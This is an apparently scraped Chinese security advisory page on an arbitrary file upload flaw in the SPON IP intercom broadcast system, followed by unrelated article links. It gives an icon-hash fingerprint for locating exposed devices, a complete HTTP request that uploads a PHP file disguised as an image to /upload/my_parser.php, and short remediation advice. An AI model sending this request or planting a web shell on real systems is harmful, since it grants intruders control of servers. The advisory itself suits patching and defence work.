当前位置: 首页 > news >正文

世邦spon IP网络对讲广播系统任意文件上传漏洞

news 来源:原创 2024/5/20 7:32:57

产品介绍

世邦通信IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

POST /upload/my_parser.php HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 200------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="upload"; filename="7788.php"
Content-Type: image/jpeg<?php echo 'ok';?>
------WebKitFormBoundary9PggsiM755PLa54a--

在这里插入图片描述
访问上传的文件
在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

相关文章:

  • LabVIEW在旋转机械故障诊断中的随机共振增强应用
  • C++系列十六:枚举
  • 第二百五十五回
  • Open3D 平均点密度计算-方法1(12)
  • 【服务器数据恢复】FreeNAS+ESXi数据恢复案例
  • 微服务实战系列之API加密
  • Java中SpringBoot组件集成接入【Knife4j接口文档(swagger增强)】
  • 20个城市公交线路数据分享,Shp+excel格式,2020年,城市发展、公共设施规划必备数据,已实现数据可视化
  • 中兴通讯5G-A场景突破成果显著,获得行业高度认可
  • dockerfile文件详解
  • C++类和对象(中)
  • Influxdb2修改管理员密码
  • 【MySQL】ANY函数 的巧用(筛选字段 > ANY(语句) 和 筛选字段 < ANY(语句))
  • 【80211-2022】【学习记录】【第九章】Duration/ID 字段(Qos STA)
  • L1-012 计算指数(Java)
  • FastReport在线报表设计器工作原理
  • in typeof instanceof ===这些运算符有什么作用
  • Java知识点总结(JDBC-连接步骤及CRUD)
  • ng6--错误信息小结(持续更新)
  • NLPIR语义挖掘平台推动行业大数据应用服务
  • sublime配置文件
  • vue总结
  • 构建工具 - 收藏集 - 掘金
  • 讲清楚之javascript作用域
  • 力扣(LeetCode)56
  • 利用jquery编写加法运算验证码
  • 使用Tinker来调试Laravel应用程序的数据以及使用Tinker一些总结
  • 视频flv转mp4最快的几种方法(就是不用格式工厂)
  • media数据库操作,可以进行增删改查,实现回收站,隐私照片功能 SharedPreferences存储地址:
  • 扩展资源服务器解决oauth2 性能瓶颈
  • 资深实践篇 | 基于Kubernetes 1.61的Kubernetes Scheduler 调度详解 ...
  • #162 (Div. 2)
  • #前后端分离# 头条发布系统
  • (12)目标检测_SSD基于pytorch搭建代码
  • (C++)栈的链式存储结构(出栈、入栈、判空、遍历、销毁)(数据结构与算法)
  • (四)TensorRT | 基于 GPU 端的 Python 推理
  • ... 是什么 ?... 有什么用处?
  • .h头文件 .lib动态链接库文件 .dll 动态链接库
  • .Net - 类的介绍
  • .NET Core IdentityServer4实战-开篇介绍与规划
  • .net 生成二级域名
  • [Android]RecyclerView添加HeaderView出现宽度问题
  • [BZOJ] 3262: 陌上花开
  • [C++][基础]1_变量、常量和基本类型
  • [C++提高编程](三):STL初识
  • [codevs 1515]跳 【解题报告】
  • [English]英语积累本
  • [ffmpeg] av_opt_set 解析
  • [G-CS-MR.PS02] 機巧之形2: Ruler Circle
  • [hdu 4405] Aeroplane chess [概率DP 期望]
  • [Linux]Ubuntu noVNC使用
  • [python]mysqlclient常用命令
  • [Python]面向对象基础
  • [SDOI2010]大陆争霸
  • [TroubleShooting]CentOS8使用pyenv部署多版本python时报 python: command not found